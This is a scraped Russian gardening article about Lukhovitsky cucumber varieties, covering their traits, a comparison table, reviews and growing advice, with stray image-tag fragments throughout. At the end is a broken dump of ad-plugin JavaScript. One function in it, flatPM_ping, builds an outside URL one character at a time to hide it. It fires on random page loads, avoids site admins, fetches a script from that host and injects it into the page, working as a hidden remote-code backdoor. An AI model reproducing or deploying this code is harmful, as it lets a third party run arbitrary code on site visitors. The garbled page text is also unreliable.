  • солят и маринуют;
  • консервируют на зиму
moy-kroha.info » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d89953f6cb2e3.jpg» alt=»table_pic_» w /> Органолептические и вкусовые качества

1. Белая или чуть желтоватая мякоть без пустот, плотная, упругая, хрусткая, очень сочная, не грубая.

2. Шкурка тонкая и нежная, еде не мешает.

3. Вкус и запах зеленцов насыщенный освежающе-огуречный. Послевкусие без горчинки, часто сладковатое

superda4nik.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d8995400921e5.jpg» alt=»table_pic_» w /> Устойчивость

1. Весенние перепады температур огурцы переносят спокойно.

2. К большинству грибковых недугов культура устойчива. Но может болеть мучнистой росой и белой плодовой гнилью

Самые распространенные сорта луховицких огурцов

tukim.kz » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d899540c3d658.jpg» alt=»table_pic_» w /> Вязниковский-37
  • форма с короткоплетистым стеблем;
  • длина зеленцов — 7–11 см, вес — 90–125 г;
  • плоды — удлиненно-яйцевидные, бугорчатые, не горчат;
  • урожайность Вязниковского — 3–3,5 кг/м²;
  • сорт стоек к болезням
Муромский-36

  • форма со среднеплетистым стеблем;
  • плоды — с мелкими бугорками удлиненно-яйцевидные, длиной 11–13 см и весом 100–140 г;
  • плодовитость формы — 3 кг/м²;
  • сорт стоек к оидиуму и бактериозу
dacha365.net » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d899542e00c13.jpg» alt=»table_pic_» w /> Миранда f1

  • форма со среднеплетистыми стеблями;
  • плоды — цилиндрические, пупырчатые, достигающие длины 10–12 см и веса 90–115 г;
  • сорт высокоурожаен — 6,3 кг/м²;
  • культура устойчива к бурой пятнистости
demsib.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d899543760eb2.jpg» alt=»table_pic_» w /> Изящный

  • форма со среднеплетистыми стеблями;
  • плоды — эллипсообразные, мелкопупырчатые, достигают длины 10–13 см и массы 100–140 г;
  • плодовитость культуры — 5–7 кг/м²;
  • сорт стоек к кладоспориозу
dachamechty.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d899544821372.jpg» alt=»table_pic_» w /> Салинас f1

  • форма с сильнорослыми стеблями;
  • плоды — маленькие, цилиндрической формы, пупырышки белесые, длина 6–9 см, масса — 70–100 г;
  • плодовитость — 3–4 кг/м²;
  • сорт стоек к оидиуму и табачной мозаике
semenaluxe.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d899544eaa043.jpg» alt=»table_pic_» w /> Адамf1

  • форма с сильнорослыми стеблями;
  • длина мелкопупырчатых цилиндрических плодов — 10–12 см, вес — 80–100 г;
  • плодовитость сорта очень высокая — до 10 кг/м²;
  • сорт стоек к оидиуму, бурой пятнистости и огуречной мозаике
nashsad.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d899545985920.jpg» alt=»table_pic_» w /> Луховицкий f1

Единственный гибрид, специально выведенный для культивации в Луховицком районе.

Характеристика и краткое описание сорта:

1. Стебли среднеплетистые, на них формируется 2–4 плодовые завязи. Листва средней величины.

2. Для сорта характерно женское цветение. Плодоносит скороспелый гибрид спустя 30–45 дней после высадки.

3. Плоды маленькие (6–8 см), удлиненно-овальной формы, темно-зеленые, с растушеванными светлыми продольными полосами. Кожица мелкопупырчатая.

4. Средняя масса огурцов составляет 85–115 г

Что говорят огородники-любители

Отзывы людей, выращивающих луховицкие огурцы:

Мария, 42 года, г. Ставрополь:

«Я всегда стараюсь насолить и намариновать как можно больше огурцов за летний сезон. Как только поспевают на даче мои любимые корнишоны Луховицкие, а за ними Зятек и Теща, так и начинаю активно заготавливать. Сколько бы ни закрыла, за зиму расходится все «на ура»! Огурчики ядреные, крепкие и хрустящие , отлично просаливаются и маринуются. Семена покупаем от агрофирмы «Гавриш» в специализированном магазине. Пока не подводили ни разу. Всхожесть высокая и растут хорошо, практически не болеют».

Андрей, 36 лет, г. Сибай:

«Всегда хотел получить свой урожай настоящих Луховицких огурцов. Недавно увидел в продаже семена гибрида с таким названием и сразу загорелся. В середине апреля начал готовить рассаду, затем посадил в теплицу, формировал кусты в один стебель, проводил подкормки. Урожай получил хороший, но вкус оказался все равно не тот , на который я рассчитывал».

Посадка и уход за огурцами

Почву перед высадкой огурцов нужно разрыхлить и хорошо увлажнить. В посадочные ямки закладывается подкормка — около ведра перегноя, смешанного с 500 г печной золы.

В открытый грунт высаживаются ростки с тремя-четырьмя листочками. Фото: riamo.ru

Поливаются огурцы при их вегетации и формировании плодов. Орошают культуру только теплой водой. На каждое растение хватает 10 л воды.

Технология выращивания луховицких огурцов допускает их подкормку только органическими удобрениями. Это может быть компост, перегной, раствор навоза или птичьего помета.

При завязи и наливе плодов культура обильно поливается. Фото: ogorod.ru

Луховицкие огурцы: секрет популярности

Луховицкие огурцы известны на всю Россию. Огуречный промысел в Луховицах, расположенных в пойме реки Оки и характеризующихся уникальными микроклиматическими условиями, появился еще в 1930 году. Зеленцы, выращиваемые здесь, всегда очень твердые, с характерными пупырышками, хрустят при сдавливании, а их длинане превышает 6−7 см.

История луховицких огурцов

Безусловно, огурцы в середине прошлого века назывались луховицкими только благодаря названию местности выращивания. Чаще всего использовались такие сорта, как «Муромский» и «Вязниковский». В 1970 году эти сорта были дополнены сортами «Изящный», «Либелла» и «Миринда».

Затем в лидеры у луховицких огуречников вышли два партенокарпических голландских гибрида под названиями «Адам» и «Солинас», которые очень успешно выращивались в Луховицах довольно длительное время.

Название сорта Растение Зеленцы Урожайность Особенности
«Муромский» Среднеплетистое, высотой до 160 см Длиной 10−14 см, мелкобугорчатые, удлиненно-яйцевидной формы, хрустящие, без горечи,

массой до 100−140 г

2−3,1 кг/ кв. м Не поражается мучнистой росой и бактериозом
«Вязниковский» Короткоплетистое, с пучковыми завязями Длиной 9−11 см, мелкобугорчатые, удлиненно-яйцевидные, без горечи,

массой до 130 г

2,6−3,5 кг/кв. м Устойчивый к болезням и температурным перепадам
«Изящный» Среднеплетистое, с 5−6 боковыми побегами Длиной 10−13 см, мелкобугорчатые, эллипсовидные, без горечи,

массой до 140 г

5−7 кг/кв. м Не поражается оливковой пятнистостью
«Либелла» Среднеплетистое, с большим количеством завязей Длиной до 12 см, мелкобугорчатые, цилиндрические, без горечи,

до 80 т /га Не поражается мозаикой и настоящей мучнистой росой
«Миринда» Среднеплетистое, с активным ростом боковых побегов Длиной 11−12 см, бугорчатые, цилиндрические, без горечи, массой 100−110 г 6,3 кг/кв. м Не поражается кладоспориозом
«Адам» Сильнорослое, с женским типом цветения Длиной 11−13 см, мелкобугорчатые, с легким белым опушением, цилиндрические, сочные, хрустящие, массой 90−95 г 8,2−10,2 кг/кв. м Не поражается кладоспориозом, вирусом огуречной мозаики и мучнистой росой
«Солинас» Сильнорослое, с пучковыми завязями Длиной 6–9 см, белошипые, мелкобугорчатые, цилиндрические, без горечи, массой 90−100 г 90–100 т/га Не поражается вирусом табачной мозаики и мучнистой росой

Описание и характеристика

В настоящее время широко культивируется такой сорт огурцов, как «Луховицкий-f1». Описание сорта дано оригинатором «Гавриш». Кусты средней плетистости, формируют 2−4 завязи. В плодоношение данный сорт вступает через полтора−два месяца после посадки и относится к категории скороспелых, универсального назначения. Листья среднего размера. Преобладает женский тип цветения.

Зеленцы короткие, овальной формы, темно-зеленого цвета, с характерными для сорта размытыми светлыми полосками средней длины. Поверхность зеленцев мелкобугорчатая или средней степени бугорчатости, с опушением. Средний вес товарного зеленца может варьироваться от 95 до 110 г.

Луховицкие огурцы: выращивание (видео)

Достоинства и недостатки

Огурец «Луховицкий-f1» предназначен для культивирования в условиях защищенного грунта и на грядах открытого грунта с применением временных пленочных укрытий. Сорт имеет достаточно большое количество достоинств и практически лишен недостатков, что делает его популярным у многих огородников:

  • гибрид партенокарпического женского типа опыления;
  • раннее формирование урожая;
  • сочная и очень вкусная мякоть с характерным хрустом;
  • отсутствие пустот внутри зеленца;
  • лишен горечи на генетическом уровне;
  • высокие товарные качества;
  • возможность универсального использования и транспортировки урожая;
  • пригоден для длительного хранения.

Гибридная форма очень устойчива к большинству болезней, формирует высокий урожай, который при соблюдении агротехники достигает 9,7−10,5 кг/кв. м или примерно 6,5−8,5 кг с каждого куста.

Технология выращивания

Очень успешно выращивать огурцы сорта «Луховицкий-f1» можно как в открытом грунте с кратковременным пленочным укрытием, так и в защищенном. Очень хороший результат достигается при посеве семенного материала в конце апреля с целью выращивания рассады и получения более раннего урожая.

Пересаживать подрощенную и закаленную огуречную рассаду на постоянное место в грунт следует в фазе 3−4 листочков. В средней полосе России высадка рассады осуществляется, начиная со второй декады мая или в начале июня, при установлении оптимального температурного режима воздуха и грунта. На гряды открытого грунта семена высеваются в последней декаде мая. При высаживании следует придерживаться схемы расстояния между растениями 50х50 см.

Гряды должны быть расположены на защищенном от ветра и прогреваемом участке. Грунт под огуречные посадки должен обладать рыхлостью и хорошей влажностью. Органику и перегной рекомендуется вносить непосредственно в посадочные лунки.

Основные поливы проводятся на стадии активной вегетации огурцов и плодообразования. Для поливов используется теплая вода. С целью поддержания оптимальных показателей влажности рекомендуется проводить мульчирование гряд, а для подкормок применяется раствор коровяка. Огурцы этого сорта выгодно отличаются очень ранним и дружным формированием урожая, что требует проведения регулярного сбора зеленцев.

Отзывы огородников

Сорт «Луховицкий-f1» прекрасно адаптирован для выращивания в личных подсобных хозяйствах и нуждается в использовании пленочных укрытий. Отзывы характеризуют огурцы «Луховицкий-f1» как очень устойчивые к поражению кладоспориозом и мучнистой росой и обладающие толерантностью к ложной мучнистой росе, или пероноспорозу.

В Луховицком районе Подмосковья первые огурчики созревают уже в мае. Собранный урожай отлично хранится, и его можно перевозить на большие расстояния. Зеленцы сохраняют высокие вкусовые качества при консервировании, имеют отличный вкус при использовании в салатах.

Как посадить огурцы (видео)

Опытные аграрии и селекционеры Луховицкого района уже сегодня готовы к выведению нескольких новых сортов огурцов, которые будут носить название «Луховицкий огурец».

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};